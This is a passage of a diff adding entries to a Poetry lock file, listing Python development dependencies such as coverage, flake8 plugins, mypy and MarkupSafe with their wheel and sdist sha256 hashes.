"coverage-6.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:f02cbbf8119db68455b9d763f2f8737bb7db7e43720afa07d8eb1604e5c5ae28"}, + {file = "coverage-6.4.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ffa9297c3a453fba4717d06df579af42ab9a28022444cae7fa605af4df612d54"}, + {file = "coverage-6.4.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:145f296d00441ca703a659e8f3eb48ae39fb083baba2d7ce4482fb2723e050d9"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d44996140af8b84284e5e7d398e589574b376fb4de8ccd28d82ad8e3bea13"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2bd9a6fc18aab8d2e18f89b7ff91c0f34ff4d5e0ba0b33e989b3cd4194c81fd9"}, + {file = "coverage-6.4.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3384f2a3652cef289e38100f2d037956194a837221edd520a7ee5b42d00cc605"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9b3e07152b4563722be523e8cd0b209e0d1a373022cfbde395ebb6575bf6790d"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_i686.whl", hash = 
"sha256:1480ff858b4113db2718848d7b2d1b75bc79895a9c22e76a221b9d8d62496428"}, + {file = "coverage-6.4.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:865d69ae811a392f4d06bde506d531f6a28a00af36f5c8649684a9e5e4a85c83"}, + {file = "coverage-6.4.1-cp38-cp38-win32.whl", hash = "sha256:664a47ce62fe4bef9e2d2c430306e1428ecea207ffd68649e3b942fa8ea83b0b"}, + {file = "coverage-6.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:26dff09fb0d82693ba9e6231248641d60ba606150d02ed45110f9ec26404ed1c"}, + {file = "coverage-6.4.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9c80df769f5ec05ad21ea34be7458d1dc51ff1fb4b2219e77fe24edf462d6df"}, + {file = "coverage-6.4.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:39ee53946bf009788108b4dd2894bf1349b4e0ca18c2016ffa7d26ce46b8f10d"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f5b66caa62922531059bc5ac04f836860412f7f88d38a476eda0a6f11d4724f4"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fd180ed867e289964404051a958f7cccabdeed423f91a899829264bb7974d3d3"}, + {file = "coverage-6.4.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:84631e81dd053e8a0d4967cedab6db94345f1c36107c71698f746cb2636c63e3"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:8c08da0bd238f2970230c2a0d28ff0e99961598cb2e810245d7fc5afcf1254e8"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:d42c549a8f41dc103a8004b9f0c433e2086add8a719da00e246e17cbe4056f72"}, + {file = "coverage-6.4.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:309ce4a522ed5fca432af4ebe0f32b21d6d7ccbb0f5fcc99290e71feba67c264"}, + {file = "coverage-6.4.1-cp39-cp39-win32.whl", hash = "sha256:fdb6f7bd51c2d1714cea40718f6149ad9be6a2ee7d93b19e9f00934c0f2a74d9"}, + {file = "coverage-6.4.1-cp39-cp39-win_amd64.whl", hash = 
"sha256:342d4aefd1c3e7f620a13f4fe563154d808b69cccef415415aece4c786665397"}, + {file = "coverage-6.4.1-pp36.pp37.pp38-none-any.whl", hash = "sha256:4803e7ccf93230accb928f3a68f00ffa80a88213af98ed338a57ad021ef06815"}, + {file = "coverage-6.4.1.tar.gz", hash = "sha256:4321f075095a096e70aff1d002030ee612b65a205a0a0f5b815280d5dc58100c"}, +] +darglint = [ + {file = "darglint-1.8.1-py3-none-any.whl", hash = "sha256:5ae11c259c17b0701618a20c3da343a3eb98b3bc4b5a83d31cdd94f5ebdced8d"}, + {file = "darglint-1.8.1.tar.gz", hash = "sha256:080d5106df149b199822e7ee7deb9c012b49891538f14a11be681044f0bb20da"}, +] +deprecated = [ + {file = "Deprecated-1.2.13-py2.py3-none-any.whl", hash = "sha256:64756e3e14c8c5eea9795d93c524551432a0be75629f8f29e67ab8caf076c76d"}, + {file = "Deprecated-1.2.13.tar.gz", hash = "sha256:43ac5335da90c31c24ba028af536a91d41d53f9e6901ddb021bcc572ce44e38d"}, +] +distlib = [ + {file = "distlib-0.3.4-py2.py3-none-any.whl", hash = "sha256:6564fe0a8f51e734df6333d08b8b94d4ea8ee6b99b5ed50613f731fd4089f34b"}, + {file = "distlib-0.3.4.zip", hash = "sha256:e4b58818180336dc9c529bfb9a0b58728ffc09ad92027a3f30b7cd91e3458579"}, +] +docutils = [ + {file = "docutils-0.17.1-py2.py3-none-any.whl", hash = "sha256:cf316c8370a737a022b72b56874f6602acf974a37a9fba42ec2876387549fc61"}, + {file = "docutils-0.17.1.tar.gz", hash = "sha256:686577d2e4c32380bb50cbb22f575ed742d58168cee37e99117a854bcd88f125"}, +] +dparse = [ + {file = "dparse-0.5.1-py3-none-any.whl", hash = "sha256:e953a25e44ebb60a5c6efc2add4420c177f1d8404509da88da9729202f306994"}, + {file = "dparse-0.5.1.tar.gz", hash = "sha256:a1b5f169102e1c894f9a7d5ccf6f9402a836a5d24be80a986c7ce9eaed78f367"}, +] +filelock = [ + {file = "filelock-3.7.0-py3-none-any.whl", hash = "sha256:c7b5fdb219b398a5b28c8e4c1893ef5f98ece6a38c6ab2c22e26ec161556fed6"}, + {file = "filelock-3.7.0.tar.gz", hash = "sha256:b795f1b42a61bbf8ec7113c341dad679d772567b936fbd1bf43c9a238e673e20"}, +] +flake8 = [ + {file = "flake8-4.0.1-py2.py3-none-any.whl", hash = 
"sha256:479b1304f72536a55948cb40a32dce8bb0ffe3501e26eaf292c7e60eb5e0428d"}, + {file = "flake8-4.0.1.tar.gz", hash = "sha256:806e034dda44114815e23c16ef92f95c91e4c71100ff52813adf7132a6ad870d"}, +] +flake8-bandit = [ + {file = "flake8_bandit-2.1.2.tar.gz", hash = "sha256:687fc8da2e4a239b206af2e54a90093572a60d0954f3054e23690739b0b0de3b"}, +] +flake8-bugbear = [ + {file = "flake8-bugbear-21.11.29.tar.gz", hash = "sha256:8b04cb2fafc6a78e1a9d873bd3988e4282f7959bb6b0d7c1ae648ec09b937a7b"}, + {file = "flake8_bugbear-21.11.29-py36.py37.py38-none-any.whl", hash = "sha256:179e41ddae5de5e3c20d1f61736feeb234e70958fbb56ab3c28a67739c8e9a82"}, +] +flake8-docstrings = [ + {file = "flake8-docstrings-1.6.0.tar.gz", hash = "sha256:9fe7c6a306064af8e62a055c2f61e9eb1da55f84bb39caef2b84ce53708ac34b"}, + {file = "flake8_docstrings-1.6.0-py2.py3-none-any.whl", hash = "sha256:99cac583d6c7e32dd28bbfbef120a7c0d1b6dde4adb5a9fd441c4227a6534bde"}, +] +flake8-polyfill = [ + {file = "flake8-polyfill-1.0.2.tar.gz", hash = "sha256:e44b087597f6da52ec6393a709e7108b2905317d0c0b744cdca6208e670d8eda"}, + {file = "flake8_polyfill-1.0.2-py2.py3-none-any.whl", hash = "sha256:12be6a34ee3ab795b19ca73505e7b55826d5f6ad7230d31b18e106400169b9e9"}, +] +flake8-rst-docstrings = [ + {file = "flake8-rst-docstrings-0.2.5.tar.gz", hash = "sha256:4fe93f997dea45d9d3c8bd220f12f0b6c359948fb943b5b48021a3f927edd816"}, + {file = "flake8_rst_docstrings-0.2.5-py3-none-any.whl", hash = "sha256:b99d9041b769b857efe45a448dc8c71b1bb311f9cacbdac5de82f96498105082"}, +] +furo = [ + {file = "furo-2022.4.7-py3-none-any.whl", hash = "sha256:7f3e3d2fb977483590f8ecb2c2cd511bd82661b79c18efb24de9558bc9cdf2d7"}, + {file = "furo-2022.4.7.tar.gz", hash = "sha256:96204ab7cd047e4b6c523996e0279c4c629a8fc31f4f109b2efd470c17f49c80"}, +] +gitdb = [ + {file = "gitdb-4.0.9-py3-none-any.whl", hash = "sha256:8033ad4e853066ba6ca92050b9df2f89301b8fc8bf7e9324d412a63f8bf1a8fd"}, + {file = "gitdb-4.0.9.tar.gz", hash = 
"sha256:bac2fd45c0a1c9cf619e63a90d62bdc63892ef92387424b855792a6cabe789aa"}, +] +gitpython = [ + {file = "GitPython-3.1.27-py3-none-any.whl", hash = "sha256:5b68b000463593e05ff2b261acff0ff0972df8ab1b70d3cdbd41b546c8b8fc3d"}, + {file = "GitPython-3.1.27.tar.gz", hash = "sha256:1c885ce809e8ba2d88a29befeb385fcea06338d3640712b59ca623c220bb5704"}, +] +googletrans = [ + {file = "googletrans-3.0.0.tar.gz", hash = "sha256:44caeea42d91ff6ead5c2d49db2b88de66c45c2fe874c8ec03eb9b4ceb3a533d"}, +] +h11 = [ + {file = "h11-0.9.0-py2.py3-none-any.whl", hash = "sha256:4bc6d6a1238b7615b266ada57e0618568066f57dd6fa967d1290ec9309b2f2f1"}, + {file = "h11-0.9.0.tar.gz", hash = "sha256:33d4bca7be0fa039f4e84d50ab00531047e53d6ee8ffbc83501ea602c169cae1"}, +] +h2 = [ + {file = "h2-3.2.0-py2.py3-none-any.whl", hash = "sha256:61e0f6601fa709f35cdb730863b4e5ec7ad449792add80d1410d4174ed139af5"}, + {file = "h2-3.2.0.tar.gz", hash = "sha256:875f41ebd6f2c44781259005b157faed1a5031df3ae5aa7bcb4628a6c0782f14"}, +] +hpack = [ + {file = "hpack-3.0.0-py2.py3-none-any.whl", hash = "sha256:0edd79eda27a53ba5be2dfabf3b15780928a0dff6eb0c60a3d6767720e970c89"}, + {file = "hpack-3.0.0.tar.gz", hash = "sha256:8eec9c1f4bfae3408a3f30500261f7e6a65912dc138526ea054f9ad98892e9d2"}, +] +hstspreload = [ + {file = "hstspreload-2021.12.1-py3-none-any.whl", hash = "sha256:e8f03aac620d1947d66e311b706b46cc24a36792b346db7b483f148360843921"}, + {file = "hstspreload-2021.12.1.tar.gz", hash = "sha256:d9cd749fbb6ff6ca1a8945c4a48cb6f33d2f6d066cb5f9752a8b64a134ed5260"}, +] +httpcore = [ + {file = "httpcore-0.9.1-py3-none-any.whl", hash = "sha256:9850fe97a166a794d7e920590d5ec49a05488884c9fc8b5dba8561effab0c2a0"}, + {file = "httpcore-0.9.1.tar.gz", hash = "sha256:ecc5949310d9dae4de64648a4ce529f86df1f232ce23dcfefe737c24d21dfbe9"}, +] +httpx = [ + {file = "httpx-0.13.3-py3-none-any.whl", hash = "sha256:32d930858eab677bc29a742aaa4f096de259f1c78c68a90ad11f5c3c04f08335"}, + {file = "httpx-0.13.3.tar.gz", hash = 
"sha256:3642bd13e90b80ba8a243a730275eb10a4c26ec96f5fc16b87e458d4ab21efae"}, +] +hyperframe = [ + {file = "hyperframe-5.2.0-py2.py3-none-any.whl", hash = "sha256:5187962cb16dcc078f23cb5a4b110098d546c3f41ff2d4038a9896893bbd0b40"}, + {file = "hyperframe-5.2.0.tar.gz", hash = "sha256:a9f5c17f2cc3c719b917c4f33ed1c61bd1f8dfac4b1bd23b7c80b3400971b41f"}, +] +identify = [ + {file = "identify-2.5.1-py2.py3-none-any.whl", hash = "sha256:0dca2ea3e4381c435ef9c33ba100a78a9b40c0bab11189c7cf121f75815efeaa"}, + {file = "identify-2.5.1.tar.gz", hash = "sha256:3d11b16f3fe19f52039fb7e39c9c884b21cb1b586988114fbe42671f03de3e82"}, +] +idna = [ + {file = "idna-2.10-py2.py3-none-any.whl", hash = "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0"}, + {file = "idna-2.10.tar.gz", hash = "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"}, +] +imagesize = [ + {file = "imagesize-1.3.0-py2.py3-none-any.whl", hash = "sha256:1db2f82529e53c3e929e8926a1fa9235aa82d0bd0c580359c67ec31b2fddaa8c"}, + {file = "imagesize-1.3.0.tar.gz", hash = "sha256:cd1750d452385ca327479d45b64d9c7729ecf0b3969a58148298c77092261f9d"}, +] +importlib-metadata = [ + {file = "importlib_metadata-3.7.3-py3-none-any.whl", hash = "sha256:b74159469b464a99cb8cc3e21973e4d96e05d3024d337313fedb618a6e86e6f4"}, + {file = "importlib_metadata-3.7.3.tar.gz", hash = "sha256:742add720a20d0467df2f444ae41704000f50e1234f46174b51f9c6031a1bd71"}, +] +iniconfig = [ + {file = "iniconfig-1.1.1-py2.py3-none-any.whl", hash = "sha256:011e24c64b7f47f6ebd835bb12a743f2fbe9a26d4cecaa7f53bc4f35ee9da8b3"}, + {file = "iniconfig-1.1.1.tar.gz", hash = "sha256:bc3af051d7d14b2ee5ef9969666def0cd1a000e121eaea580d4a313df4b37f32"}, +] +jinja2 = [ + {file = "Jinja2-3.1.2-py3-none-any.whl", hash = "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61"}, + {file = "Jinja2-3.1.2.tar.gz", hash = "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852"}, +] +livereload = [ + {file = 
"livereload-2.6.3.tar.gz", hash = "sha256:776f2f865e59fde56490a56bcc6773b6917366bce0c267c60ee8aaf1a0959869"}, +] +markdown = [ + {file = "Markdown-3.3.5-py3-none-any.whl", hash = "sha256:0d2d09f75cb8d1ffc6770c65c61770b23a61708101f47bda416a002a0edbc480"}, + {file = "Markdown-3.3.5.tar.gz", hash = "sha256:26e9546bfbcde5fcd072bd8f612c9c1b6e2677cb8aadbdf65206674f46dde069"}, +] +markupsafe = [ + {file = "MarkupSafe-2.1.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:86b1f75c4e7c2ac2ccdaec2b9022845dbb81880ca318bb7a0a01fbf7813e3812"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f121a1420d4e173a5d96e47e9a0c0dcff965afdf1626d28de1460815f7c4ee7a"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a49907dd8420c5685cfa064a1335b6754b74541bbb3706c259c02ed65b644b3e"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10c1bfff05d95783da83491be968e8fe789263689c02724e0c691933c52994f5"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7bd98b796e2b6553da7225aeb61f447f80a1ca64f41d83612e6139ca5213aa4"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b09bf97215625a311f669476f44b8b318b075847b49316d3e28c08e41a7a573f"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:694deca8d702d5db21ec83983ce0bb4b26a578e71fbdbd4fdcd387daa90e4d5e"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:efc1913fd2ca4f334418481c7e595c00aad186563bbc1ec76067848c7ca0a933"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-win32.whl", hash = "sha256:4a33dea2b688b3190ee12bd7cfa29d39c9ed176bda40bfa11099a3ce5d3a7ac6"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:dda30ba7e87fbbb7eab1ec9f58678558fd9a6b8b853530e176eabd064da81417"}, + {file = 
"MarkupSafe-2.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:671cd1187ed5e62818414afe79ed29da836dde67166a9fac6d435873c44fdd02"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3799351e2336dc91ea70b034983ee71cf2f9533cdff7c14c90ea126bfd95d65a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e72591e9ecd94d7feb70c1cbd7be7b3ebea3f548870aa91e2732960fa4d57a37"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6fbf47b5d3728c6aea2abb0589b5d30459e369baa772e0f37a0320185e87c980"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:d5ee4f386140395a2c818d149221149c54849dfcfcb9f1debfe07a8b8bd63f9a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:bcb3ed405ed3222f9904899563d6fc492ff75cce56cba05e32eff40e6acbeaa3"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:e1c0b87e09fa55a220f058d1d49d3fb8df88fbfab58558f1198e08c1e1de842a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-win32.whl", hash = "sha256:8dc1c72a69aa7e082593c4a203dcf94ddb74bb5c8a731e4e1eb68d031e8498ff"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:97a68e6ada378df82bc9f16b800ab77cbf4b2fada0081794318520138c088e4a"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e8c843bbcda3a2f1e3c2ab25913c80a3c5376cd00c6e8c4a86a89a28c8dc5452"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0212a68688482dc52b2d45013df70d169f542b7394fc744c02a57374a4207003"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e576a51ad59e4bfaac456023a78f6b5e6e7651dcd383bcc3e18d06f9b55d6d1"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:4b9fe39a2ccc108a4accc2676e77da025ce383c108593d65cc909add5c3bd601"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:96e37a3dc86e80bf81758c152fe66dbf60ed5eca3d26305edf01892257049925"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:6d0072fea50feec76a4c418096652f2c3238eaa014b2f94aeb1d56a66b41403f"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:089cf3dbf0cd6c100f02945abeb18484bd1ee57a079aefd52cffd17fba910b88"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6a074d34ee7a5ce3effbc526b7083ec9731bb3cbf921bbe1d3005d4d2bdb3a63"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-win32.whl", hash = "sha256:421be9fbf0ffe9ffd7a378aafebbf6f4602d564d34be190fc19a193232fd12b1"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:fc7b548b17d238737688817ab67deebb30e8073c95749d55538ed473130ec0c7"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:e04e26803c9c3851c931eac40c695602c6295b8d432cbe78609649ad9bd2da8a"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b87db4360013327109564f0e591bd2a3b318547bcef31b468a92ee504d07ae4f"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:99a2a507ed3ac881b975a2976d59f38c19386d128e7a9a18b7df6fff1fd4c1d6"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:56442863ed2b06d19c37f94d999035e15ee982988920e12a5b4ba29b62ad1f77"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3ce11ee3f23f79dbd06fb3d63e2f6af7b12db1d46932fe7bd8afa259a5996603"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:33b74d289bd2f5e527beadcaa3f401e0df0a89927c1559c8566c066fa4248ab7"}, + {file = 
"MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:43093fb83d8343aac0b1baa75516da6092f58f41200907ef92448ecab8825135"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8e3dcf21f367459434c18e71b2a9532d96547aef8a871872a5bd69a715c15f96"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-win32.whl", hash = "sha256:d4306c36ca495956b6d568d276ac11fdd9c30a36f1b6eb928070dc5360b22e1c"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:46d00d6cfecdde84d40e572d63735ef81423ad31184100411e6e3388d405e247"}, + {file = "MarkupSafe-2.1.1.tar.gz", hash = "sha256:7f91197cc9e48f989d12e4e6fbc46495c446636dfc81b9ccf50bb0ec74b91d4b"}, +] +mccabe = [ + {file = "mccabe-0.6.1-py2.py3-none-any.whl", hash = "sha256:ab8a6258860da4b6677da4bd2fe5dc2c659cff31b3ee4f7f5d64e79735b80d42"}, + {file = "mccabe-0.6.1.tar.gz", hash = "sha256:dd8d182285a0fe56bace7f45b5e7d1a6ebcbf524e8f3bd87eb0f125271b8831f"}, +] +mypy = [ + {file = "mypy-0.910-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:a155d80ea6cee511a3694b108c4494a39f42de11ee4e61e72bc424c490e46457"}, + {file = "mypy-0.910-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:b94e4b785e304a04ea0828759172a15add27088520dc7e49ceade7834275bedb"}, + {file = "mypy-0.910-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:088cd9c7904b4ad80bec811053272986611b84221835e079be5bcad029e79dd9"}, + {file = "mypy-0.910-cp35-cp35m-win_amd64.whl", hash = "sha256:adaeee09bfde366d2c13fe6093a7df5df83c9a2ba98638c7d76b010694db760e"}, + {file = "mypy-0.910-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:ecd2c3fe726758037234c93df7e98deb257fd15c24c9180dacf1ef829da5f921"}, + {file = "mypy-0.910-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:d9dd839eb0dc1bbe866a288ba3c1afc33a202015d2ad83b31e875b5905a079b6"}, + {file = "mypy-0.910-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:3e382b29f8e0ccf19a2df2b29a167591245df90c0b5a2542249873b5c1d78212"}, + {file = "mypy-0.910-cp36-cp36m-win_amd64.whl", hash = 
"sha256:53fd2eb27a8ee2892614370896956af2ff61254c275aaee4c230ae771cadd885"}, + {file = "mypy-0.910-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b6fb13123aeef4a3abbcfd7e71773ff3ff1526a7d3dc538f3929a49b42be03f0"}, + {file = "mypy-0.910-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:e4dab234478e3bd3ce83bac4193b2ecd9cf94e720ddd95ce69840273bf44f6de"}, + {file = "mypy-0.910-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:7df1ead20c81371ccd6091fa3e2878559b5c4d4caadaf1a484cf88d93ca06703"}, + {file = "mypy-0.910-cp37-cp37m-win_amd64.whl", hash = "sha256:0aadfb2d3935988ec3815952e44058a3100499f5be5b28c34ac9d79f002a4a9a"}, + {file = "mypy-0.910-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ec4e0cd079db280b6bdabdc807047ff3e199f334050db5cbb91ba3e959a67504"}, + {file = "mypy-0.910-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:119bed3832d961f3a880787bf621634ba042cb8dc850a7429f643508eeac97b9"}, + {file = "mypy-0.910-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:866c41f28cee548475f146aa4d39a51cf3b6a84246969f3759cb3e9c742fc072"}, + {file = "mypy-0.910-cp38-cp38-win_amd64.whl", hash = "sha256:ceb6e0a6e27fb364fb3853389607cf7eb3a126ad335790fa1e14ed02fba50811"}, + {file = "mypy-0.910-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1a85e280d4d217150ce8cb1a6dddffd14e753a4e0c3cf90baabb32cefa41b59e"}, + {file = "mypy-0.910-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:42c266ced41b65ed40a282c575705325fa7991af370036d3f134518336636f5b"}, + {file = "mypy-0.910-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:3c4b8ca36877fc75339253721f69603a9c7fdb5d4d5a95a1a1b899d8b86a4de2"}, + {file = "mypy-0.910-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:c0df2d30ed496a08de5daed2a9ea807d07c21ae0ab23acf541ab88c24b26ab97"}, + {file = "mypy-0.910-cp39-cp39-win_amd64.whl", hash = "sha256:c6c2602dffb74867498f86e6129fd52a2770c48b7cd3ece77ada4fa38f94eba8"}, + {file = "mypy-0.910-py3-none-any.whl", hash = "sha256:ef565033fa5a958e62796867b1df10c40263ea9ded87164d67572834e57a174d"}, 
+ {file = "mypy-0.910.tar.gz", hash = "sha256:704098302473cb31a218f1775a873b376b30b4c18229421e9e9dc8916fd16150"}, +] +mypy-extensions = [ + {file = "mypy_extensions-0.4.3-py2.py3-none-any.whl", hash = "sha256:090fedd75945a69ae91ce1303b5824f428daf5a028d2f6ab8a299250a846f15d"}, + {file = "mypy_extensions-0.4.3.tar.gz", hash = "sha256:2d82818f5bb3e369420cb3c4060a7970edba416647068eb4c5343488a6c604a8"}, +] +nodeenv = [ + {file = "nodeenv-1.6.0-py2.py3-none-any.whl", hash = "sha256:621e6b7076565ddcacd2db0294c0381e01fd28945ab36bcf00f41c5daf63bef7"}, + {file = "nodeenv-1.6.0.tar.gz", hash = "sha256:3ef13ff90291ba2a4a7a4ff9a979b63ffdd00a464dbe04acf0ea6471517a4c2b"}, +] +packaging = [ + {file = "packaging-21.3-py3-none-any.whl", hash = "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522"}, + {file = "packaging-21.3.tar.gz", hash = "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb"}, +] +pathspec = [ + {file = "pathspec-0.9.0-py2.py3-none-any.whl", hash = "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a"}, + {file = "pathspec-0.9.0.tar.gz", hash = "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1"}, +] +pbr = [ + {file = "pbr-5.9.0-py2.py3-none-any.whl", hash = "sha256:e547125940bcc052856ded43be8e101f63828c2d94239ffbe2b327ba3d5ccf0a"}, + {file = "pbr-5.9.0.tar.gz", hash = "sha256:e8dca2f4b43560edef58813969f52a56cef023146cbb8931626db80e6c1c4308"}, +] +pep8-naming = [ + {file = "pep8-naming-0.12.1.tar.gz", hash = "sha256:bb2455947757d162aa4cad55dba4ce029005cd1692f2899a21d51d8630ca7841"}, + {file = "pep8_naming-0.12.1-py2.py3-none-any.whl", hash = "sha256:4a8daeaeb33cfcde779309fc0c9c0a68a3bbe2ad8a8308b763c5068f86eb9f37"}, +] +platformdirs = [ + {file = "platformdirs-2.5.2-py3-none-any.whl", hash = "sha256:027d8e83a2d7de06bbac4e5ef7e023c02b863d7ea5d079477e722bb41ab25788"}, + {file = "platformdirs-2.5.2.tar.gz", hash = 
"sha256:58c8abb07dcb441e6ee4b11d8df0ac856038f944ab98b7be6b27b2a3c7feef19"}, +] +pluggy = [ + {file = "pluggy-1.0.0-py2.py3-none-any.whl", hash = "sha256:74134bbf457f031a36d68416e1509f34bd5ccc019f0bcc952c7b909d06b37bd3"}, + {file = "pluggy-1.0.0.tar.gz", hash = "sha256:4224373bacce55f955a878bf9cfa763c1e360858e330072059e10bad68531159"}, +] +pre-commit = [ + {file = "pre_commit-2.19.0-py2.py3-none-any.whl", hash = "sha256:10c62741aa5704faea2ad69cb550ca78082efe5697d6f04e5710c3c229afdd10"}, + {file = "pre_commit-2.19.0.tar.gz", hash = "sha256:4233a1e38621c87d9dda9808c6606d7e7ba0e087cd56d3fe03202a01d2919615"}, +] +pre-commit-hooks = [ + {file = "pre_commit_hooks-4.2.0-py2.py3-none-any.whl", hash = "sha256:b3a3066c5ecd5fdda9abdc932bd064bd21785ea041659676403e6fc5d964afed"}, + {file = "pre_commit_hooks-4.2.0.tar.gz", hash = "sha256:9726420c7a071e8cb233a066d36bc074b593a40f0b1b491d1b75aafa55390703"}, +] 